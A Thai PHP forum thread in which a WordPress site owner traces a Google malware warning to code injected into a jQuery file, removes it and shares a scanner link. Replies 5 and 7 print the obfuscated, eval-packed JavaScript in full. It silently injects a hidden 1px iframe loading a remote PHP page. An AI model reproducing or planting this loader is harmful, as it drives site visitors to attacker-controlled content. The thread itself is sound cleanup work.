Forgot Password ??

PHP , ASP , ASP.NET, VB.NET, C#, Java , jQuery , Android , iOS , Windows Phone

	Registered : 109,038

HOME > PHP > PHP Forum > เว็บไซต์นี้อาจเป็นอันตราย! << โดนเตือนแบบนี้อยากหาทางแก้

เว็บไซต์นี้อาจเป็นอันตราย! << โดนเตือนแบบนี้อยากหาทางแก้

เริ่มหัวข้อใหม่

meen

โพสกระทู้ ( 88 )
บทความ ( 0 )

Google webmasters tools แจ้งเตือนว่าเว็บผมมี มัลแวร์ ฝังอยู่เพจหนึ่ง
เป็นเว็บ CMS >> Wordpress พอเข้าไป หัวข้อๆ หนึ่ง ID ประมาณ พันกว่าๆ พบว่าหน้านั้นๆถูกปิดกลั้นด้วยประโยคนี้

เว็บไซต์นี้อาจเป็นอันตราย!ฯล (เป็นเฉพาะหน้าในๆหน้าเดียว หน้าหลักไม่เป็น)

จึงอยากรู้ว่าเราจะเข้าไปแก้ไขหน้าที่มีปัญหานี้ได้อย่างไร คือจะหาหน้านี้เจอ ด้วยไฟล์สคริปชื่ออะไร?
โดยปกติแล้ว Post แต่ละ Post ของ Wordpress มันจะถูกเก็บไว้ที่ไฟล์อะไร ขอคำชี้แนะด้วยครับ

ปล.ถ้าแก้ไม่ได้คงต้องลบหน้านั้นๆทิ้ง แต่อยากรู้ว่ามันเป็นสคริปอะไรที่มาฝังไว้ เพื่อหาทางป้องกันต่อไป

Tag : PHP

Date : 2011-08-24 18:55:05

By : Meen2007

View : 1103

Reply : 9

No. 1

Mongkon.k

โพสกระทู้ ( 3,848 )
บทความ ( 0 )

บอกยากครับ ไม่เห็นโค้ดว่าใช้อะไรในหน้านั้นบ้าง

Date : 2011-08-24 21:01:55

By : mangkunzo

No. 2

TC Admin

โพสกระทู้ ( 74,058 )
บทความ ( 838 )

ตามนี้ครับ

แก้ไขหน้า Webpage ที่มีปัญหาจากนั้น Request เพื่อขอตรวจสอบ ใช้เวลาไม่เกิน 1 วัน เร็วสุด

Go to : ผมอัฟเว็บขึ้นโฮส แล้วตรวจพบมัลแวร์ ผมจะแก้ไขยังไงหรอ แล้วทำไงให้รู้ว่ามันอยู่ไฟล์ไหน
Go to : อะไรกันนี่ อยู่ดีๆกลายเป็นเว็บไซต์อันตราย ได้ไง ไมทราบว่าเคยเจอเหตุการที่ Firefox บอกว่าเป็น

Date : 2011-08-24 21:11:39

By : webmaster

No. 3

TC Admin

โพสกระทู้ ( 74,058 )
บทความ ( 838 )

หรือไม่ลองส่ง url มาให้ดูครับ จะช่วยดูให้ครับ

Date : 2011-08-24 21:12:05

By : webmaster

No. 4

meen

โพสกระทู้ ( 88 )
บทความ ( 0 )

ขอบคุณครับเดี๋ยวจะลองดู ได้ไม่ได้เดี๋ยวจะบอกครับ

Date : 2011-08-24 22:42:57

By : Meen2007

No. 5

meen

โพสกระทู้ ( 88 )
บทความ ( 0 )

เจอ ส่วนเกินนี้เพิ่มมาจากไฟล์ jquery-1.5.1.js ซึ่งต้นฉบับไม่มี

var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

ประวัติการแก้ไข
2011-08-25 17:43:20
2011-08-25 17:44:04

Date : 2011-08-24 23:23:05

By : Meen2007

No. 6

meen

โพสกระทู้ ( 88 )
บทความ ( 0 )

save บันทึกหน้าที่ขึ้นเตือน มัลแวร์ มาดูโค้ดทั้งหมดแล้วแต่ยังหาไม่เจอครับ ช่วยดูให้หน่อย ลิงค์ตามกระทู้บน

Date : 2011-08-25 11:21:45

By : Meen2007

No. 7

meen

โพสกระทู้ ( 88 )
บทความ ( 0 )

แก้ได้แล้วครับ เป็นมัลแวร์มาในรูปแบบของการฝังไว้ใน จาวาสคริป ดังนี้

อ้างอิง : จากการตรวจสอบจากเว็บ http://sitecheck.sucuri.net/scanner/
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs2368

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

ฝากไว้สำหรับผู้ที่มีปัญหาถูกมัลแวร์ฝัง ให้ไปสแกนหาที่เว็บ http://sitecheck.sucuri.net/scanner/
เว็บนี้จะบอกรายละเอียด ตำแหน่ง ชื่อของไฟล์ และสคริปที่ถูกฝังอย่างละเอียด ต่อจากนั้นเราต้องไปตามลบออกเอาเอง
แหล่งศูนย์ข้อมูลเพิ่มเติมเกี่ยวกับไวรัส มัลแวร์ แฝงทางเว็บไซต์ https://badwarebusters.org/main/itemview/23594

ประวัติการแก้ไข
2011-08-25 17:46:30

Date : 2011-08-25 17:42:46

By : Meen2007

No. 8

TC Admin

โพสกระทู้ ( 74,058 )
บทความ ( 838 )

ครับ ลบออกแล้วก็ขอ Request ก็หายแล้วครับ หรือไม่รอ 1-2 วันให้ bot เข้ามาใหม่ ก็หายแล้วครับ

Date : 2011-08-25 17:46:08

By : webmaster

No. 9

meen

โพสกระทู้ ( 88 )
บทความ ( 0 )

ขอบคุณครับพี่วิน

Date : 2011-08-25 17:48:53

By : Meen2007

ค้นหาข้อมูล

แสดงความคิดเห็น

Re : เว็บไซต์นี้อาจเป็นอันตราย! << โดนเตือนแบบนี้อยากหาทางแก้

รายละเอียด

เพื่อความเรียบร้อยของข้อความ ควรจัดรูปแบบให้พอดีกับขนาดของหน้าจอ เพื่อง่ายต่อการอ่านและสบายตา และตรวจสอบภาษาไทยให้ถูกต้อง

อัพโหลดแทรกรูปภาพ

Notice

เพื่อความปลอดภัยของเว็บบอร์ด ไม่อนุญาติให้แทรก แท็ก [img]....[/img] โดยการอัพโหลดไฟล์รูปจากที่อื่น เช่นเว็บไซต์ ฟรีอัพโหลดต่าง ๆ
อัพโหลดแทรกรูปภาพ ให้ใช้บริการอัพโหลดไฟล์ของไทยครีเอท และตัดรูปภาพให้พอดีกับสกรีน เพื่อความโหลดเร็วและไฟล์ไม่ถูกลบทิ้ง

เพื่อความปลอดภัยและการตรวจสอบ กระทู้ที่แทรกไฟล์อัพโหลดไฟล์จากที่อื่น อาจจะถูกลบทิ้ง

โดย

อีเมล์

บวกค่าให้ถูก